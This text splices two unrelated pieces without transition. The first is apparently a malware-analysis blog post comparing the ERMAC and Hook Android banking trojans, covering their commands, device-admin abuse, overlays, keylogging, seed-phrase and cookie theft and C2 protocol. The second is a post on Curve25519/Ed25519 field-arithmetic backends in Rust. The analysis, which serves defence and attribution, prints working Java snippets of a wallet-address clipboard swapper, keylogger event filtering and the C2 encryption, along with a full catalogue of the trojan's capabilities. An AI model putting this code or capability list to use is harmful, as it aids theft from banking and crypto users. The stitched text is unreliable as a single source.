In the code snippet above we can see that the createScreenCaptureIntent() method is called on the MediaProjectionManager, which is necessary to start screen capture on the device. Along with the many commands to interact with the UI, this allows the malware operator to gain complete control over an infected device and perform actions on the victim’s behalf.
Command implementation
For the commands that are available in both ERMAC and Hook, the code implementation is nearly identical. Take the “logaccounts” command for example:
This command is used to obtain a list of available accounts by their name and type on the victim’s device. When comparing the code, it’s clear that the logging messages are the main difference. This is the case for all commands that are present in both ERMAC and Hook.
Russian commands
Both ERMAC and the Hook v1 sample that we analysed contain some rather edgy commands in Russian that do not provide any useful functionality.
The command above translates to “Die_he_who_reversed_this“.
All the Russian commands create a file named “system.apk” in the “apk” directory and immediately delete it. It appears that the authors have recently decided to run a more reputable business, as these commands were removed in the latest Hook sample that we analysed.
New commands in Hook V2
In the latest versions of Hook, the authors have added 9 additional commands compared to the first Hook sample that we analysed. These commands are:
| Command | Description |
| --- | --- |
| send_sms_many | Sends an SMS message to multiple phone numbers |
| addwaitview | Displays a “wait / loading” view with a progress bar, custom background colour, text colour, and text to be displayed |
| removewaitview | Removes the “wait / loading” view that is displayed on the victim’s device because of the “addwaitview” command |
| addview | Adds a new view with a black background that covers the entire screen |
| removeview | Removes the view with the black background that was added by the “addview” command |
| cookie | Steals session cookies (targets victim’s Google account) |
| safepal | Starts the Safepal Wallet application (and steals seed phrases as a result of starting this application, as observed during analysis of the accessibility service) |
| exodus | Starts the Exodus Wallet application (and steals seed phrases as a result of starting this application, as observed during analysis of the accessibility service) |
| takephoto | Takes a photo of the victim using the front facing camera |
One of the already existing commands, “onkeyevent”, also received a new payload option: “double_tap”. As the name suggests, this performs a double tap gesture on the victim’s screen, providing the malware operator with extra functionality to interact with the victim’s device user interface.
More interesting additions are: the support for stealing recovery seed phrases from other crypto wallets (Safepal and Exodus), taking a photo of the victim, and stealing session cookies. Session cookie stealing appears to be a popular trend in Android malware, as we have observed this feature being added to multiple malware families. This is an attractive feature, as it allows the actor to gain access to user accounts without needing the actual login credentials.
Device Admin abuse
Besides adding new commands, the authors have added more functionality related to the “Device Administration API” in the latest version of Hook. This API was developed to support enterprise apps in Android. When an app has device admin privileges, it gains additional capabilities meant for managing the device. This includes the ability to enforce password policies, lock the screen, and even wipe the device remotely. As you may expect, abuse of these privileges is often seen in Android malware.
DeviceAdminReceiver and policies
To implement custom device admin functionality, a class should extend the “DeviceAdminReceiver”. This class can be found by examining the app’s Manifest file and searching for the receiver with the “BIND_DEVICE_ADMIN” permission or the “DEVICE_ADMIN_ENABLED” action.
In the screenshot above, you can see an XML file declared as follows: android:resource="@xml/buyanigetili". This file contains the device admin policies that can be used by the app. Here’s a comparison of the device admin policies in ERMAC, Hook 1, and Hook 2:
Comparing Hook to ERMAC, the authors have removed the “WIPE_DATA” policy and added the “RESET_PASSWORD” policy in the first version of Hook. In the latest version of Hook, the “DISABLE_KEYGUARD_FEATURES” and “WATCH_LOGIN” policies were added. Below you’ll find a description of each policy that is seen in the screenshot.
| Device Admin Policy | Description |
| --- | --- |
| USES_POLICY_FORCE_LOCK | The app can lock the device |
| USES_POLICY_WIPE_DATA | The app can factory reset the device |
| USES_POLICY_RESET_PASSWORD | The app can reset the device’s password/PIN code |
| USES_POLICY_DISABLE_KEYGUARD_FEATURES | The app can disable use of keyguard (lock screen) features, such as the fingerprint scanner |
| USES_POLICY_WATCH_LOGIN | The app can watch login attempts from the user |
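For reference, Android device admin policies are declared in an XML resource like the hypothetical reconstruction below, based on the policies listed above for the latest Hook version (the actual resource in the sample is @xml/buyanigetili, whose exact contents are not reproduced here):

```xml
<!-- Hypothetical device admin policy file matching the Hook 2 policies above. -->
<device-admin xmlns:android="http://schemas.android.com/apk/res/android">
    <uses-policies>
        <force-lock />                <!-- USES_POLICY_FORCE_LOCK -->
        <reset-password />            <!-- USES_POLICY_RESET_PASSWORD -->
        <disable-keyguard-features /> <!-- USES_POLICY_DISABLE_KEYGUARD_FEATURES -->
        <watch-login />               <!-- USES_POLICY_WATCH_LOGIN -->
    </uses-policies>
</device-admin>
```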
The “DeviceAdminReceiver” class in Android contains methods that can be overridden. This is done to customise the behaviour of a device admin receiver. For example: the “onPasswordFailed” method in the DeviceAdminReceiver is called when an incorrect password is entered on the device. This method can be overridden to perform specific actions when a failed login attempt occurs. In ERMAC and Hook 1, the class that extends the DeviceAdminReceiver only overrides the onReceive() method and the implementation is minimal:
The onReceive() method is the entry point for broadcasts that are intercepted by the device admin receiver. In ERMAC and Hook 1 this only performs a check to see whether the received parameters are null and will throw an exception if they are.
DeviceAdminReceiver additions in latest version of Hook
In the latest edition of Hook, the class to extend the DeviceAdminReceiver does not just override the “onReceive” method. It also overrides the following methods:
| Device Admin Method | Description |
| --- | --- |
| onDisableRequested() | Called when the user attempts to disable device admin. Gives the developer a chance to present a warning message to the user |
| onDisabled() | Called prior to device admin being disabled. Upon return, the app can no longer use the protected parts of the DevicePolicyManager API |
| onEnabled() | Called after device admin is first enabled. At this point, the app can use “DevicePolicyManager” to set the desired policies |
| onPasswordFailed() | Called when the user has entered an incorrect password for the device |
| onPasswordSucceeded() | Called after the user has entered a correct password for the device |
When the victim attempts to disable device admin, a warning message is displayed that contains the text “Your mobile is die”.
The fingerprint scanner is disabled when an incorrect password is entered on the victim’s device, possibly to make it easier to break into the device later by forcing the victim to enter their PIN, which can then be captured. All keyguard (lock screen) features are enabled again once a correct password is entered.
Overlay attacks
Overlay attacks, also known as injections, are a popular tactic to steal credentials on Android devices. When an app has permission to draw overlays, it can display content on top of other apps that are running on the device. This is interesting for threat actors, because it allows them to display a phishing window over a legitimate app. When the victim enters their credentials in this window, the malware will capture them.
Both ERMAC and Hook use web injections to display a phishing window as soon as they detect a targeted app being launched on the victim’s device.
In the screenshot above, you can see how ERMAC and Hook set up a WebView component and load the HTML code to be displayed over the target app by calling webView5.loadDataWithBaseURL(null, s6, "text/html", "UTF-8", null) and this.setContentView() on the WebView object. The “s6” variable contains the data to be loaded. The main functionality is the same for both variants, with Hook having some additional logging messages.
The importance of accessibility services
Accessibility Service abuse plays an important role when it comes to web injections and other automated features in ERMAC and Hook. Accessibility services are used to assist users with disabilities, or users who may temporarily be unable to fully interact with their Android device. For example, users who are driving might need additional or alternative interface feedback. Accessibility services run in the background and receive callbacks from the system when an AccessibilityEvent is fired. Apps with accessibility services enabled can have full visibility over UI events, both from the system and from third-party apps: they can receive notifications, get the package name, list UI elements, extract text, and more. While these services are meant to assist users, they can also be abused by malicious apps for activities such as keylogging, automatically granting the app additional permissions, and monitoring foreground apps to overlay them with phishing windows.
When ERMAC or Hook malware is first launched, it prompts the victim with a window that instructs them to enable accessibility services for the malicious app.
A warning message is displayed before enabling the accessibility service, which shows what actions the app will be able to perform when this is enabled.
With accessibility services enabled, ERMAC and Hook automatically grant themselves additional permissions, such as the permission to draw overlays. The onAccessibilityEvent() method monitors the package names from received accessibility events, and the web injection related code is executed when a target app is launched.
Targeted applications
When the infected device is ready to communicate with the C2 server, it sends a list of applications that are currently installed on the device. The C2 server then responds with the target apps that it has injections for. While dynamically analysing the latest version of Hook, we sent a custom HTTP request to the C2 server to make it believe that we have a large number of apps (700+) installed. For this, we used the list of package names that CSIRT KNF had shared in an analysis report of Hook [2].
The server responded with the list of target apps that the malware can display phishing windows for. Most of the targeted apps in both Hook and ERMAC are related to banking.
Keylogging
Keylogging functionality can be found in the onAccessibilityEvent() method of both ERMAC and Hook. For every accessibility event type that is triggered on the infected device, a method is called that contains keylogger functionality. This method then checks what the accessibility event type was to label the log and extracts the text from it. Comparing the code implementation of keylogging in ERMAC to Hook, there are some slight differences in the accessibility event types that it checks for. But the main functionality of extracting text and sending it to the C2 with a certain label is the same.
The ERMAC keylogger contains an extra check for accessibility event “TYPE_VIEW_SELECTED” (triggered when a user selects a view, such as tapping on a button). Accessibility services can extract information about a selected view, such as the text, and that is exactly what is happening here.
Hook specifically checks for two other accessibility events: the “TYPE_WINDOW_STATE_CHANGED” event (triggered when the state of an active window changes, for example when a new window is opened) or the “TYPE_WINDOW_CONTENT_CHANGED” event (triggered when the content within a window changes, like when the text within a window is updated).
It checks for these events in combination with the content change type “CONTENT_CHANGE_TYPE_TEXT” (indicating that the text of a UI element has changed). This tells us that the accessibility service is interested in changes to the textual content within a window, which is not surprising for a keylogger.
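The event filtering described above can be condensed into a small, self-contained sketch. The event type names mirror Android’s AccessibilityEvent constants, but the mapping and label strings are illustrative, not lifted from the samples:

```java
import java.util.Map;

// Simplified sketch of the keylogger's labelling logic: each accessibility
// event type of interest maps to a label attached to the extracted text.
public class KeyLogLabeler {
    static final Map<String, String> LABELS = Map.of(
            "TYPE_VIEW_TEXT_CHANGED", "Keylogger",    // text typed into a field
            "TYPE_VIEW_CLICKED", "Click",             // element tapped
            "TYPE_WINDOW_STATE_CHANGED", "Window",    // new window opened (Hook)
            "TYPE_WINDOW_CONTENT_CHANGED", "Window"); // window text updated (Hook)

    /** Returns the label for the extracted text, or null to ignore the event. */
    public static String label(String eventType) {
        return LABELS.get(eventType);
    }
}
```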
Stealing of crypto wallet seed phrases
Automatic stealing of recovery seeds from crypto wallets is one of the main features in ERMAC and Hook. This feature is actively developed, with support added for extra crypto wallets in the latest version of Hook.
For this feature, the accessibility service first checks if a crypto wallet app has been opened. It will then find UI elements by their ID (such as “com.wallet.crypto.trustapp:id/wallets_preference” and “com.wallet.crypto.trustapp:id/item_wallet_info_action”) and automatically click on these elements until it has navigated to the view that contains the recovery seed phrase. To the crypto wallet app, it will look as if the user browsed to this phrase themselves.
Once the window with the recovery seed phrase is reached, it will extract the words from the recovery seed phrase and send them to the C2 server.
The main implementation is the same in ERMAC and Hook for this feature, with Hook containing some extra logging messages and support for stealing seed phrases from additional cryptocurrency wallets.
Replacing copied crypto wallet addresses
Besides automatically stealing recovery seeds from opened crypto wallet apps, ERMAC and Hook can also detect whether a wallet address has been copied, and replace the clipboard content with their own wallet address. They do this by monitoring for the “TYPE_VIEW_TEXT_CHANGED” event and checking whether the text matches a regular expression for Bitcoin or Ethereum wallet addresses. If it matches, the clipboard text is replaced with the wallet address of the threat actor.
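The clipboard check can be illustrated with a short, self-contained sketch. The regular expressions below are common patterns for legacy/bech32 Bitcoin and Ethereum addresses; they are our own approximation, not the exact expressions used in the samples. The attacker addresses are the ones hardcoded in the analysed samples:

```java
import java.util.regex.Pattern;

// Sketch of the clipboard-swapping check (approximate, illustrative regexes).
public class ClipboardSwapper {
    static final Pattern BTC = Pattern.compile("^(bc1[a-z0-9]{25,59}|[13][a-km-zA-HJ-NP-Z1-9]{25,34})$");
    static final Pattern ETH = Pattern.compile("^0x[a-fA-F0-9]{40}$");

    // Attacker-controlled addresses, as hardcoded in the analysed samples.
    static final String ATTACKER_BTC = "bc1ql34xd8ynty3myfkwaf8jqeth0p4fxkxg673vlf";
    static final String ATTACKER_ETH = "0x3Cf7d4A8D30035Af83058371f0C6D4369B5024Ca";

    /** Returns the attacker's address if the clipboard holds a wallet address, else the original text. */
    public static String swap(String clipboardText) {
        if (BTC.matcher(clipboardText).matches()) return ATTACKER_BTC;
        if (ETH.matcher(clipboardText).matches()) return ATTACKER_ETH;
        return clipboardText;
    }
}
```

In the malware, this check runs inside the accessibility event handler; the sketch isolates only the matching and replacement logic.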
The wallet addresses that the actors use in both ERMAC and Hook are bc1ql34xd8ynty3myfkwaf8jqeth0p4fxkxg673vlf for Bitcoin and 0x3Cf7d4A8D30035Af83058371f0C6D4369B5024Ca for Ethereum. It’s worth mentioning that these wallet addresses are the same in all samples that we analysed. It appears that this feature has not been very successful for the actors, as they have received only two transactions at the time of writing.
Since the feature has been so unsuccessful, we assume that both received transactions were initiated by the actors themselves. The latest transaction was received from a verified Binance exchange wallet, and it’s unlikely that this comes from an infected device. The other transaction comes from a wallet that could be owned by the Hook actors.
Stealing of session cookies
The “cookie” command is exclusive to Hook and was only added in the latest version of this malware. This feature allows the malware operator to steal session cookies in order to take over the victim’s login session. To do so, a new WebViewClient is set up. When the victim has logged onto their account, the onPageFinished() method of the WebViewClient is called, and the stolen cookies are sent to the C2 server.
All cookie stealing code is related to Google accounts. This is in line with DukeEugene’s announcement of new features that were posted about on April 1st, 2023. See #12 in the screenshot below.
C2 communication protocol
HTTP in ERMAC
ERMAC is known to use the HTTP protocol for communicating with the C2 server, where data is encrypted using AES-256-CBC and then Base64 encoded. The bot sends HTTP POST requests to a randomly generated URL that ends with “.php/” (note that the IP of the C2 server remains the same).
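The encoding scheme described here, AES-256-CBC followed by Base64, can be sketched in plain Java as below. The key and IV handling is illustrative only; the actual key material and request framing used by ERMAC are not reproduced:

```java
import java.nio.charset.StandardCharsets;
import java.util.Base64;
import javax.crypto.Cipher;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;

// Sketch of the C2 payload encoding: AES-256-CBC (32-byte key), then Base64.
public class C2Codec {
    private static Cipher cipher(int mode, byte[] key, byte[] iv) throws Exception {
        Cipher c = Cipher.getInstance("AES/CBC/PKCS5Padding");
        c.init(mode, new SecretKeySpec(key, "AES"), new IvParameterSpec(iv));
        return c;
    }

    public static String encrypt(byte[] key, byte[] iv, String plaintext) {
        try {
            byte[] ct = cipher(Cipher.ENCRYPT_MODE, key, iv)
                    .doFinal(plaintext.getBytes(StandardCharsets.UTF_8));
            return Base64.getEncoder().encodeToString(ct);
        } catch (Exception e) {
            throw new IllegalStateException(e);
        }
    }

    public static String decrypt(byte[] key, byte[] iv, String encoded) {
        try {
            byte[] pt = cipher(Cipher.DECRYPT_MODE, key, iv)
                    .doFinal(Base64.getDecoder().decode(encoded));
            return new String(pt, StandardCharsets.UTF_8);
        } catch (Exception e) {
            throw new IllegalStateException(e);
        }
    }
}
```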
WebSockets in Hook
The first editions of Hook introduced WebSocket communication using Socket.IO, and data is encrypted using the same mechanism as in ERMAC. The Socket.IO library is built on top of the WebSocket protocol and offers low-latency, bidirectional and event-based communication between a client and a server. Socket.IO provides additional guarantees such as fallback to the HTTP protocol and automatic reconnection [3].
The screenshot above shows that the login command was issued to the server, with the user ID of the infected device being sent as encrypted data. The “42” at the beginning of the message is standard in Socket.IO, where the “4” stands for the Engine.IO “message” packet type and the “2” for Socket.IO’s “message” packet type [3].
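A minimal sketch of parsing this framing (the “42” prefix handling follows the Socket.IO protocol; the method name is ours):

```java
// "4" = Engine.IO "message" packet type, "2" = Socket.IO "message" packet type,
// so a frame like 42["login","<encrypted data>"] carries an event message.
public class SocketIoFrame {
    /** Returns the JSON event payload if the frame is a Socket.IO event message, else null. */
    public static String eventPayload(String frame) {
        if (frame.startsWith("42")) {
            return frame.substring(2); // e.g. ["login","<encrypted user id>"]
        }
        return null;
    }
}
```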
Mix and match – Protocols in latest versions of Hook
The latest Hook version that we’ve analysed contains the ERMAC HTTP protocol implementation, as well as the WebSocket implementation which already existed in previous editions of Hook. The Hook code snippet below shows that it uses the exact same code implementation as observed in ERMAC to build the URLs for HTTP requests.
Both Hook and ERMAC use the “checkAP” command to check for commands sent by the C2 server. In the screenshot below, you can see that the malware operator sent the “killme” command to the infected device to uninstall Hook. This shows that the ERMAC HTTP protocol is actively used in the latest versions of Hook, together with the already existing WebSocket implementation.
C2 servers
During our investigation into the technical differences between Hook and ERMAC, we have also collected C2 servers related to both families. From these servers, Russia is clearly the preferred country for hosting Hook and ERMAC C2s. We have identified a total of 23 Hook C2 servers that are hosted in Russia.
Other countries in which we found ERMAC and Hook C2 servers hosted are:
The Netherlands
United Kingdom
United States
Germany
France
Korea
Japan
The end?
On the 19th of April 2023, DukeEugene announced that they are closing the Hook project due to leaving for “special military operation”. The actor mentions that the coder of the Hook project, who goes by the nickname “RedDragon”, will continue to support their clients until their lease runs out.
Two days prior to this announcement, the coder of Hook created a post stating that the source code of Hook was for sale at a price of $70,000. Nearly a month later, on May 11th, the coder asked if the thread could be closed as the source code had been sold.
Observations
In the “Replacing copied crypto wallet addresses” section of this blog, we mentioned that the first received transaction comes from an Ethereum wallet address that could possibly be owned by the Hook actors. We noticed that this wallet received a transaction of roughly $25,000 the day after Hook was announced as sold. This could be a coincidence, but the fact that this wallet was also the first to send (a small amount of) money to the Ethereum address that is hardcoded in Hook and ERMAC makes us suspect a connection.
We can’t verify whether the messages from DukeEugene and RedDragon are true. But if they are, we expect to see interesting new forks of Hook in the future.
In this blog we’ve debunked DukeEugene’s claim that Hook was fully developed from scratch. Additionally, in DukeEugene’s advertisement of HookBot we see a screenshot of the Hook panel that seems to show similarities with ERMAC’s panel.
Conclusion
While the actors of Hook had announced that the malware was written from scratch, it is clear that the ERMAC source code was used as a base. All commands that are present in ERMAC also exist in Hook, and the code implementation of these commands is nearly identical in both malware families. Both Hook and ERMAC contain typical features to steal credentials which are common in Android malware, such as overlay attacks/injections and keylogging. Perhaps a more interesting feature that exists in both malware families is the automated stealing of recovery seeds from cryptocurrency wallets.
While Hook was not written completely from scratch, the authors have added interesting new features compared to ERMAC. With the added capability of being able to stream the victim’s screen and interacting with the UI, operators of Hook can gain complete control over infected devices and perform actions on the user’s behalf. Other interesting new features include the ability to take a photo of the victim using their front facing camera, stealing of cookies related to Google login sessions, and the added support for stealing recovery seeds from additional cryptocurrency wallets.
Besides these new features, significant changes were made in the protocol for communicating with the C2 server. The first versions of Hook introduced WebSocket communication using the Socket.IO library. The latest version of Hook added the HTTP protocol implementation that was already present in ERMAC and can use this next to WebSocket communication.
Hook had a relatively short run. It was first announced on the 12th of January 2023, and the closing of the project was announced on April 19th, 2023, with the actor claiming that he is leaving for “special military operation”. The coder of Hook has allegedly put the source code up for sale at a price of $70,000 and stated that it was sold on May 11th, 2023. If these announcements are true, it could mean that we will see interesting new forks of Hook in the future.
The following Suricata rules were tested successfully against Hook network traffic:
The second Suricata rule uses an additional Lua script, which can be found here
List of Commands
Family | Command | Description
ERMAC, Hook 1 2 | sendsms | Sends a specified SMS message to a specified number. If the SMS message is too large, it will send the message in multiple parts
ERMAC, Hook 1 2 | startussd | Executes a given USSD code on the victim’s device
ERMAC, Hook 1 2 | forwardcall | Sets up a call forwarder to forward all calls to the specified number in the payload
ERMAC, Hook 1 2 | push | Displays a push notification on the victim’s device, with a custom app name, title, and text to be edited by the malware operator
ERMAC, Hook 1 2 | getcontacts | Gets a list of all contacts on the victim’s device
ERMAC, Hook 1 2 | getaccounts | Gets a list of the accounts on the victim’s device by their name and account type
ERMAC, Hook 1 2 | logaccounts | Gets a list of the accounts on the victim’s device by their name and account type
ERMAC, Hook 1 2 | getinstallapps | Gets a list of the installed apps on the victim’s device
ERMAC, Hook 1 2 | getsms | Steals all SMS messages from the victim’s device
ERMAC, Hook 1 2 | startinject | Performs a phishing overlay attack against the given application
ERMAC, Hook 1 2 | openurl | Opens the specified URL
ERMAC, Hook 1 2 | startauthenticator2 | Starts the Google Authenticator app
ERMAC, Hook 1 2 | trust | Launches the Trust Wallet app
ERMAC, Hook 1 2 | mycelium | Launches the Mycelium Wallet app
ERMAC, Hook 1 2 | piuk | Launches the Blockchain Wallet app
ERMAC, Hook 1 2 | samourai | Launches the Samourai Wallet app
ERMAC, Hook 1 2 | bitcoincom | Launches the Bitcoin Wallet app
ERMAC, Hook 1 2 | toshi | Launches the Coinbase Wallet app
ERMAC, Hook 1 2 | metamask | Launches the Metamask Wallet app
ERMAC, Hook 1 2 | sendsmsall | Sends a specified SMS message to all contacts on the victim’s device. If the SMS message is too large, it will send the message in multiple parts
ERMAC, Hook 1 2 | startapp | Starts the app specified in the payload
ERMAC, Hook 1 2 | clearcash | Sets the “autoClickCache” shared preference key to value 1, and launches the “Application Details” setting for the specified app (probably to clear the cache)
ERMAC, Hook 1 2 | clearcache | Sets the “autoClickCache” shared preference key to value 1, and launches the “Application Details” setting for the specified app (probably to clear the cache)
ERMAC, Hook 1 2 | calling | Calls the number specified in the “number” payload, tries to lock the device, and attempts to hide and mute the application
ERMAC, Hook 1 2 | deleteapplication | Uninstalls a specified application
ERMAC, Hook 1 2 | startadmin | Sets the “start_admin” shared preference key to value 1, which is probably used as a check before attempting to gain Device Admin privileges (as seen in Hook samples)
ERMAC, Hook 1 2 | killme | Stores the package name of the malicious app in the “killApplication” shared preference key, in order to uninstall it. This is the kill switch for the malware
ERMAC, Hook 1 2 | updateinjectandlistapps | Gets a list of the currently installed apps on the victim’s device, and downloads the injection target lists
ERMAC, Hook 1 2 | gmailtitles | Sets the “gm_list” shared preference key to the value “start” and starts the Gmail app
ERMAC, Hook 1 2 | getgmailmessage | Sets the “gm_mes_command” shared preference key to the value “start” and starts the Gmail app
Hook 1 2 | start_vnc | Starts capturing the victim’s screen constantly (streaming)
Hook 1 2 | stop_vnc | Stops capturing the victim’s screen constantly (streaming)
Hook 1 2 | takescreenshot | Takes a screenshot of the victim’s device (note that it starts the same activity as for the “start_vnc” command, but without the extra “streamScreen” set to true, so as to take only one screenshot)
Hook 1 2 | swipe | Performs a swipe gesture with the specified 4 coordinates
Hook 1 2 | swipeup | Performs a swipe up gesture
Hook 1 2 | swipedown | Performs a swipe down gesture
Hook 1 2 | swipeleft | Performs a swipe left gesture
Hook 1 2 | swiperight | Performs a swipe right gesture
Hook 1 2 | scrollup | Performs a scroll up gesture
Hook 1 2 | scrolldown | Performs a scroll down gesture
Hook 1 2 | onkeyevent | Performs a certain action depending on the specified key payload (POWER DIALOG, BACK, HOME, LOCK SCREEN, or RECENTS)
Hook 1 2 | onpointerevent | Sets X and Y coordinates and performs an action based on the payload text provided. Three options: “down”, “continue”, and “up”. These payloads work together: the first sets the starting coordinates to press down at, the second sets the coordinates to draw a line to from the previous coordinates, and the third performs a stroke gesture using this information
Hook 1 2 | longpress | Dispatches a long press gesture at the specified coordinates
Hook 1 2 | tap | Dispatches a tap gesture at the specified coordinates
Hook 1 2 | clickat | Clicks at a specific UI element
Hook 1 2 | clickattext | Clicks on the UI element with a specific text value
Hook 1 2 | clickatcontaintext | Clicks on the UI element that contains the payload text
Hook 1 2 | cuttext | Replaces the clipboard on the victim’s device with the payload text
Hook 1 2 | settext | Sets a specified UI element to the specified text
Hook 1 2 | openapp | Opens the specified app
Hook 1 2 | openwhatsapp | Sends a message through Whatsapp to the specified number
Hook 1 2 | addcontact | Adds a new contact to the victim’s device
Hook 1 2 | getcallhistory | Gets a log of the calls that the victim made
Hook 1 2 | makecall | Calls the number specified in the payload
Hook 1 2 | forwardsms | Sets up an SMS forwarder to forward the received and sent SMS messages from the victim’s device to the specified number in the payload
Hook 1 2 | getlocation | Gets the geographic coordinates (latitude and longitude) of the victim
Hook 1 2 | getimages | Gets a list of all images on the victim’s device
Hook 1 2 | downloadimage | Downloads an image from the victim’s device
Hook 1 2 | fmmanager | Either lists the files at a specified path (additional parameter “ls”), or downloads a file from the specified path (additional parameter “dl”)
Hook 2 | send_sms_many | Sends an SMS message to multiple phone numbers
Hook 2 | addwaitview | Displays a “wait / loading” view with a progress bar, custom background colour, text colour, and text to be displayed
Hook 2 | removewaitview | Removes a “RelativeLayout” view group, which displays child views together in relative positions. More specifically: this command removes the “wait / loading” view that is displayed on the victim’s device as a result of the “addwaitview” command
Hook 2 | addview | Adds a new view with a black background that covers the entire screen
Hook 2 | removeview | Removes a “LinearLayout” view group, which arranges other views either horizontally in a single row or vertically in a single column. More specifically: this command removes the view with the black background that was added by the “addview” command
Hook 2 | cookie | Steals session cookies (targets victim’s Google account)
Hook 2 | safepal | Starts the Safepal Wallet application (and steals seed phrases as a result of starting this application, as observed during analysis of the accessibility service)
Hook 2 | exodus | Starts the Exodus Wallet application (and steals seed phrases as a result of starting this application, as observed during analysis of the accessibility service)
Hook 2 | takephoto | Takes a photo of the victim using the front facing camera
This post is about a rather technical coding strategy choice that arises when implementing cryptographic algorithms on some elliptic curves, namely how to represent elements of the base field. We will be discussing Curve25519 implementations, in particular as part of Ed25519 signatures, as specified in RFC 8032. The most widely used Rust implementation of these operations is the curve25519-dalek library. My own research library is crrl, also written in plain Rust (no assembly); it is meant for research purposes, but I write it using all best practices for production-level implementations, e.g. it is fully constant-time and offers an API amenable to integration into various applications.
The following table shows the performance of Ed25519 signature generation and verification with these libraries, using various backend implementations for operations in the base field (integers modulo 2^255 - 19), on two test platforms (64-bit x86 and 64-bit RISC-V):
Library | Backend | sign (x86) | verify (x86) | sign (RISC-V) | verify (RISC-V)
crrl | m64 | 49130 | 108559 | 202021 | 412764
crrl | m51 | 70149 | 148653 | 158928 | 304902
curve25519-dalek | simd | 59553 | 116243 | – | –
curve25519-dalek | serial | 59599 | 169621 | 180142 | 449980
curve25519-dalek | fiat | 70552 | 198289 | 187220 | 429755

Ed25519 performance (in clock cycles), on x86 (Intel “Coffee Lake”) and RISC-V (SiFive U74).
Test platforms are the following:
x86: an Intel Core i5-8259U CPU, running at 2.30 GHz (TurboBoost is disabled). This uses “Coffee Lake” cores (one of the late variants of the “Skylake” line). Operating system is Linux (Ubuntu 22.04), in 64-bit mode.
RISC-V: a StarFive VisionFive2 board with a StarFive JH7110 CPU, running at 1 GHz. The CPU contains four SiFive U74 cores and implements the I, M, C, Zba and Zbb architecture extensions (and some others which are not relevant here). Operating system is again Linux (Ubuntu 23.04), in 64-bit mode.
In both cases, the current Rust “stable” version is used (1.72.0, from 2023-08-23), and compilation uses the environment variable RUSTFLAGS="-C target-cpu=native" to allow the compiler to use all opcodes supported by the current platform. The computation is performed over a single core, with measurements averaged over randomized inputs. The CPU cycle counter is used. Figures above are listed with many digits, but in practice there is a bit of natural variance due to varying inputs (signature verification is not constant-time, since it uses only public data) and, more generally, because of the effect of various operations also occurring within the CPU (e.g. management mode, cache usage from other cores, interruptions from hardware…), so that the measured values should be taken with a grain of salt (roughly speaking, differences below about 3% are not significant).
crrl and curve25519-dalek differ a bit in how they use internal tables to speed up computations; in general, crrl tables are smaller, and crrl performs fewer point additions but more point doublings. For signature verification, crrl implements the Antipa et al. optimization with Lagrange’s algorithm for lattice basis reduction, but curve25519-dalek does not. The measurements above show that crrl’s strategy works: it is a tad faster than curve25519-dalek (though note that curve25519-dalek supports batch signature verification with a substantially lower per-signature cost, a feature crrl does not implement yet). The point of this post is not to boast about how crrl is faster; its good performance should rather be taken as an indication that it is decently optimized, and thus a fair illustration of the effect of its implementation strategy choices. Indeed, the interesting part is how the different backends compare to each other on the two tested architectures.
curve25519-dalek has three backends:
serial: Field elements are split over 5 limbs of 51 bits; that is, value x is split into five values x0 to x4, such that x = x0 + 2^51*x1 + 2^102*x2 + 2^153*x3 + 2^204*x4. Importantly, limb values are held in 64-bit words and may somewhat exceed 2^51 (within some limits, to avoid overflows during computations). The representation is redundant, in that a given field element x accepts many different representations; a normalization step is applied when necessary (e.g. when serializing curve points into bytes).
fiat: The fiat backend is a wrapper around the fiat-crypto library, which uses basically the same implementation strategy as the serial backend, but through automatic code generation that includes a correctness proof. In other words, the fiat backend is guaranteed through the magic of mathematics to always return the correct result, while in all other library backends listed here, the guarantee is “only” through the non-magic of code auditors (including myself) poring over the code for hours in search of issues, and not finding any (in practice all the code referenced here is believed correct).
simd: AVX2 opcodes are used to perform arithmetic operations on four field elements in parallel; each element is split over ten limbs of 25 and 26 bits each. curve25519-dalek selects that backend whenever possible, i.e. on x86 systems which have AVX2 (such as an Intel “Coffee Lake”), but of course it is not available on RISC-V.
crrl has two backends:
m51: A “51-bit limbs” backend similar to curve25519-dalek’s “serial”, though with somewhat different choices for the actual operations (this is detailed later on).
m64: Field elements are split over four 64-bit limbs, held in 64-bit types. By nature, such limbs cannot exceed their 64-bit range. The representation is still slightly redundant in that overall values may use the complete 256-bit range, so that each field element has two or three possible representations (a final reduction modulo 2^255 - 19 is performed before serializing).
The “m64” backend could be deemed to be the most classical, in that such a representation would be what was preferred for big integer computations in, say, the 1990s. It minimizes the number of multiplication opcode invocations during a field element multiplication (with two 4-limb operands, 16 register multiplications are used), but also implies quite a lot of carry propagation. See for instance this excerpt of the implementation of field element multiplication in crrl’s m64 backend:
let (e0, e1) = umull(a0, b0);
let (e2, e3) = umull(a1, b1);
let (e4, e5) = umull(a2, b2);
let (e6, e7) = umull(a3, b3);

let (lo, hi) = umull(a0, b1);
let (e1, cc) = addcarry_u64(e1, lo, 0);
let (e2, cc) = addcarry_u64(e2, hi, cc);
let (lo, hi) = umull(a0, b3);
let (e3, cc) = addcarry_u64(e3, lo, cc);
let (e4, cc) = addcarry_u64(e4, hi, cc);
let (lo, hi) = umull(a2, b3);
let (e5, cc) = addcarry_u64(e5, lo, cc);
let (e6, cc) = addcarry_u64(e6, hi, cc);
let (e7, _) = addcarry_u64(e7, 0, cc);

let (lo, hi) = umull(a1, b0);
let (e1, cc) = addcarry_u64(e1, lo, 0);
let (e2, cc) = addcarry_u64(e2, hi, cc);
let (lo, hi) = umull(a3, b0);
let (e3, cc) = addcarry_u64(e3, lo, cc);
let (e4, cc) = addcarry_u64(e4, hi, cc);
let (lo, hi) = umull(a3, b2);
let (e5, cc) = addcarry_u64(e5, lo, cc);
let (e6, cc) = addcarry_u64(e6, hi, cc);
let (e7, _) = addcarry_u64(e7, 0, cc);
The addcarry_u64() calls above implement the “add with carry” operation, which, on x86, map to the ADC opcode (or, on that core, the ADCX or ADOX opcodes).
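For reference, the two helpers used in the excerpt can be sketched in portable Rust as follows (my own illustrative definitions; crrl’s actual helpers are intrinsics-backed and may differ in detail):

```rust
#[inline]
fn umull(x: u64, y: u64) -> (u64, u64) {
    // Full 64x64 -> 128-bit product, returned as (low, high) 64-bit words.
    let z = (x as u128) * (y as u128);
    (z as u64, (z >> 64) as u64)
}

#[inline]
fn addcarry_u64(x: u64, y: u64, c: u8) -> (u64, u8) {
    // x + y + c, returning the low 64 bits and the output carry (0 or 1).
    let z = (x as u128) + (y as u128) + (c as u128);
    (z as u64, (z >> 64) as u8)
}
```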
